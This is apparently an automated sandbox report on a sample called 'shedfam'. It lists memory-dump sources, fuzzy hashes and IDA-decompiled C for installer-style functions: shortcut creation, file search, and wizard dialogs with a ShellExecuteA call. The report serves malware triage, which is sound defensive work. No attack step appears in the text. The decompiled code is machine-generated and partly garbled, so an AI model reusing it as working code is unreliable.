Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: /B$A$C:\Users\user\AppData\Local\Temp
API String ID: 2624150263-3422370627
Opcode ID: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
Instruction ID: 04579f169ebad34731529ea4dd061e989e150d10634133a65e55446a4c87498a
Opcode Fuzzy Hash: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
Instruction Fuzzy Hash: A5A17EB1900209ABDB11EFA1CC45AAF77B8EF85355F10843BFA01B62D1D77C9A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
				_t96 = E00402A0C(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
				if(E0040585B(_t96) == 0) {
					E00402A0C(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409448, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409448, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040203f
0x00402049
0x00402052
0x0040205c
0x00402065
0x0040206f
0x00402073
0x00402073
0x00402078
0x00402089
0x00402091
0x00402171
0x00402171
0x00402178
0x00402097
0x00402097
0x004020a8
0x004020ac
0x004020b2
0x004020bc
0x004020be
0x004020c9
0x004020cc
0x004020d9
0x004020db
0x004020dd
0x004020e4
0x004020e7
0x004020e7
0x004020ea
0x004020f4
0x004020fc
0x00402101
0x0040210d
0x0040210d
0x00402110
0x00402119
0x0040211c
0x00402125
0x0040212a
0x0040213c
0x0040214b
0x0040214d
0x00402159
0x00402159
0x0040214b
0x0040215b
0x00402161
0x00402161
0x00402164
0x0040216a
0x0040216f
0x00402184
0x00000000
0x00000000
0x00000000
0x0040216f
0x0040217a
0x004028a4
0x004028b0

APIs

CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409448,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020C1

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-501415292
Opcode ID: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
Instruction ID: 2bdc35c2d2963d88c22d289f5388ef8df5706d1624f03911357c3292c4b85553
Opcode Fuzzy Hash: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
Instruction Fuzzy Hash: B2416275A00204BFDB00EFA4CD89E9E7BB6EF49314B20416AF905EB2D1CA79DD41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402654 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402654(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
					E00405C59(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405CFB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x0040266c
0x00402680
0x0040268b
0x0040268c
0x004027c7
0x0040266e
0x0040266e
0x00402670
0x00402672
0x00402672
0x004028a4
0x004028b0

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
Instruction ID: 2317ffd169cfaf4cb587e6187c2204c3bd1190871e25379d9522107c79eb17b9
Opcode Fuzzy Hash: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
Instruction Fuzzy Hash: 3AF0A732508100DAD710E7B49949AEEB368EF51328F60457BE505F20C1C6B84945DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE4 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403AE4(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420564 = _t35;
					if(_t115 == 0x110) {
						 *0x423f88 = _t125;
						 *0x420578 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f540 = _t91;
						E00403FB7(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423768);
						 *0x42374c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420564 = 1;
					}
					_t122 =  *0x4091e8; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423fa0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00404003(0x40b);
						while(1) {
							_t37 =  *0x420564;
							 *0x4091e8 =  *0x4091e8 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091e8; // 0xffffffff
							__eflags = _t39 -  *0x423fa4;
							if(_t39 ==  *0x423fa4) {
								E0040140B(1);
							}
							__eflags =  *0x42374c - _t133;
							if( *0x42374c != _t133) {
								break;
							}
							__eflags =  *0x4091e8 -  *0x423fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D1D(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403FB7(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42400c - _t133;
							_v32 = _t49;
							if( *0x42400c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403FD9(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f540, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42400c - _t133;
							if( *0x42400c == _t133) {
								_push( *0x420578);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f540);
							}
							E00403FEC();
							E00405CFB(0x420580, 0x423780);
							E00405D1D(0x420580, _t125, _t130,  &(0x420580[lstrlenA(0x420580)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420580);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423758);
									 *0x41fd50 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f80,  *_t130 +  *0x423760 & 0x0000ffff, _t125,  *(0x4091ec +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423758 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403FB7(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423758, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42374c - _t133;
									if( *0x42374c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423758, 8);
									E00404003(0x405);
									goto L58;
								}
								__eflags =  *0x42400c - _t133;
								if( *0x42400c != _t133) {
									goto L61;
								}
								__eflags =  *0x424000 - _t133;
								if( *0x424000 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423758);
						 *0x423f88 = _t133;
						EndDialog(_t125,  *0x41f948);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423758, 0x40f, 0, 1);
						__eflags =  *0x42374c;
						return 0 |  *0x42374c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420558, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420558,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E0040401E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423758, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42400c - _t133;
										if( *0x42400c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f948 = 1;
											L21:
											_push(0x78);
											L22:
											E00403F90();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f948 = _t127;
										goto L21;
									}
									__eflags =  *0x4091e8 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423758);
						 *0x423758 = _a12;
						L58:
						_t141 =  *0x421580 - _t133; // 0x0
						if(_t141 == 0 &&  *0x423758 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421580 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403aed
0x00403af6
0x00403c37
0x00403c3b
0x00403c3f
0x00403c41
0x00403c46
0x00403c51
0x00403c5c
0x00403c61
0x00403c63
0x00403c65
0x00403c68
0x00403c6d
0x00403c7b
0x00403c88
0x00403c8f
0x00403c8f
0x00403c90
0x00403c90
0x00403c95
0x00403c9b
0x00403ca2
0x00403ca8
0x00403caa
0x00403cea
0x00403cef
0x00403cf4
0x00403cf4
0x00403cf9
0x00403d02
0x00403d04
0x00403d09
0x00403d0f
0x00403d13
0x00403d13
0x00403d18
0x00403d1e
0x00000000
0x00000000
0x00403d29
0x00403d2f
0x00000000
0x00000000
0x00403d38
0x00403d40
0x00403d45
0x00403d48
0x00403d4e
0x00403d53
0x00403d56
0x00403d5c
0x00403d61
0x00403d64
0x00403d6a
0x00403d72
0x00403d78
0x00403d7e
0x00403d82
0x00403d89
0x00403d89
0x00403d89
0x00403d93
0x00403da5
0x00403db1
0x00403db6
0x00403dc0
0x00403dc6
0x00403dc8
0x00403dcd
0x00403dca
0x00403dca
0x00403dca
0x00403ddd
0x00403df5
0x00403df7
0x00403dfd
0x00403e12
0x00403dff
0x00403e08
0x00403e0a
0x00403e0a
0x00403e18
0x00403e28
0x00403e39
0x00403e40
0x00403e46
0x00403e4a
0x00403e4f
0x00403e51
0x00000000
0x00403e57
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5f
0x00403e63
0x00403e88
0x00403e8e
0x00403e94
0x00403e96
0x00000000
0x00000000
0x00403ebc
0x00403ec2
0x00403ec4
0x00403ec9
0x00000000
0x00000000
0x00403ecf
0x00403ed2
0x00403ed5
0x00403eec
0x00403ef8
0x00403f11
0x00403f17
0x00403f1b
0x00403f20
0x00403f26
0x00000000
0x00000000
0x00403f30
0x00403f3b
0x00000000
0x00403f3b
0x00403e65
0x00403e6b
0x00000000
0x00000000
0x00403e71
0x00403e77
0x00000000
0x00000000
0x00000000
0x00403e7d
0x00403e51
0x00403f48
0x00403f54
0x00403f5b
0x00000000
0x00403cac
0x00403cac
0x00403caf
0x00403ce2
0x00403ce2
0x00403ce4
0x00000000
0x00000000
0x00000000
0x00403ce4
0x00403cb1
0x00403cb5
0x00403cba
0x00403cbc
0x00000000
0x00000000
0x00403ccc
0x00403cd4
0x00000000
0x00403cda
0x00403b08
0x00403b08
0x00403b0c
0x00403b11
0x00403b20
0x00403b20
0x00403b29
0x00403b32
0x00403b3d
0x00403b3d
0x00403b49
0x00403b65
0x00403b68
0x00403b7b
0x00403b81
0x00403c24
0x00000000
0x00403c2d
0x00403b87
0x00403b94
0x00403b96
0x00403b98
0x00403bb7
0x00403bb7
0x00403bba
0x00403bbf
0x00403bc2
0x00403bd2
0x00403bd3
0x00403bd5
0x00403c0b
0x00403c1e
0x00000000
0x00403c1e
0x00403bd7
0x00403bdd
0x00403bf6
0x00403bfb
0x00403bfd
0x00000000
0x00000000
0x00403bff
0x00403beb
0x00403beb
0x00403bed
0x00403bed
0x00000000
0x00403bed
0x00403be0
0x00403be5
0x00000000
0x00403be5
0x00403bc4
0x00403bca
0x00000000
0x00000000
0x00403bcc
0x00000000
0x00403bcc
0x00403bbc
0x00000000
0x00403bbc
0x00403ba2
0x00403ba9
0x00403baf
0x00403bb1
0x00000000
0x00000000
0x00000000
0x00403bb1
0x00403b6d
0x00000000
0x00403b4b
0x00403b51
0x00403b5b
0x00403f61
0x00403f61
0x00403f67
0x00403f74
0x00403f7a
0x00403f7a
0x00403f84
0x00000000
0x00403f84
0x00403b49

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
ShowWindow.USER32(?), ref: 00403B3D
DestroyWindow.USER32 ref: 00403B51
SetWindowLongA.USER32 ref: 00403B6D
GetDlgItem.USER32 ref: 00403B8E
SendMessageA.USER32 ref: 00403BA2
IsWindowEnabled.USER32(00000000), ref: 00403BA9
GetDlgItem.USER32 ref: 00403C57
GetDlgItem.USER32 ref: 00403C61
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403C7B
SendMessageA.USER32 ref: 00403CCC
GetDlgItem.USER32 ref: 00403D72
ShowWindow.USER32(00000000,?), ref: 00403D93
EnableWindow.USER32(?,?), ref: 00403DA5
EnableWindow.USER32(?,?), ref: 00403DC0
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
EnableMenuItem.USER32 ref: 00403DDD
SendMessageA.USER32 ref: 00403DF5
SendMessageA.USER32 ref: 00403E08
lstrlenA.KERNEL32(00420580,?,00420580,00423780), ref: 00403E31
SetWindowTextA.USER32(?,00420580), ref: 00403E40
ShowWindow.USER32(?,0000000A), ref: 00403F74

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
Instruction ID: 583b1d6e72ee06ddf0416b700d05e2a9c6fbe9640e5ca120217838ed285f2c24
Opcode Fuzzy Hash: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
Instruction Fuzzy Hash: 00C1C471A08205BBDB216F61ED85D2B7FBCEB4470AF50443EF601B51E1C739AA429B1E

Uniqueness

Uniqueness Score: -1.00%

Function 004040FF Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004040FF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420560 =  *0x420560 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040401E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422f20
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420560 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd50 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403FD9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040438A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42375c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004040CB;
				E00403FB7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403FB7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403FD9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403FEC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423f90 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f544 =  *0x41f544 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420560 =  *0x420560 & 0x00000000;
				return 0;
			}

0x0040410f
0x00404235
0x00404291
0x00404295
0x0040436c
0x0040436e
0x0040436e
0x00404374
0x00404374
0x00404377
0x00000000
0x0040437e
0x004042a3
0x004042a5
0x004042af
0x004042ba
0x004042bd
0x004042c0
0x004042cb
0x004042ce
0x004042d5
0x004042e3
0x004042fb
0x00404303
0x0040430e
0x0040431e
0x00404320
0x00404320
0x004042d5
0x0040432a
0x00000000
0x00404335
0x00404339
0x0040434a
0x0040434a
0x00404350
0x0040435e
0x0040435e
0x00000000
0x00404362
0x0040432a
0x00404240
0x00000000
0x00404254
0x0040425a
0x00404260
0x00000000
0x00000000
0x00404285
0x00404287
0x0040428c
0x00000000
0x0040428c
0x00404240
0x00404115
0x00404118
0x0040411d
0x0040412e
0x0040412e
0x00404135
0x00404138
0x0040413a
0x0040413f
0x00404148
0x0040414e
0x0040415a
0x0040415d
0x00404166
0x0040416b
0x0040416e
0x00404173
0x0040418a
0x00404191
0x004041a4
0x004041a7
0x004041bc
0x004041c3
0x004041c8
0x004041cd
0x004041cd
0x004041dc
0x004041eb
0x004041ed
0x00404203
0x00404212
0x00404214
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040418A
GetDlgItem.USER32 ref: 0040419E
SendMessageA.USER32 ref: 004041BC
GetSysColor.USER32(?), ref: 004041CD
SendMessageA.USER32 ref: 004041DC
SendMessageA.USER32 ref: 004041EB
lstrlenA.KERNEL32(?), ref: 004041F5
SendMessageA.USER32 ref: 00404203
SendMessageA.USER32 ref: 00404212
GetDlgItem.USER32 ref: 00404275
SendMessageA.USER32 ref: 00404278
GetDlgItem.USER32 ref: 004042A3
SendMessageA.USER32 ref: 004042E3
LoadCursorA.USER32 ref: 004042F2
SetCursor.USER32(00000000), ref: 004042FB
ShellExecuteA.SHELL32(0000070B,open, /B,00000000,00000000,00000001), ref: 0040430E
LoadCursorA.USER32 ref: 0040431B
SetCursor.USER32(00000000), ref: 0040431E
SendMessageA.USER32 ref: 0040434A
SendMessageA.USER32 ref: 0040435E

Strings

/B, xrefs: 00404303
open, xrefs: 00404306
N, xrefs: 00404291

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

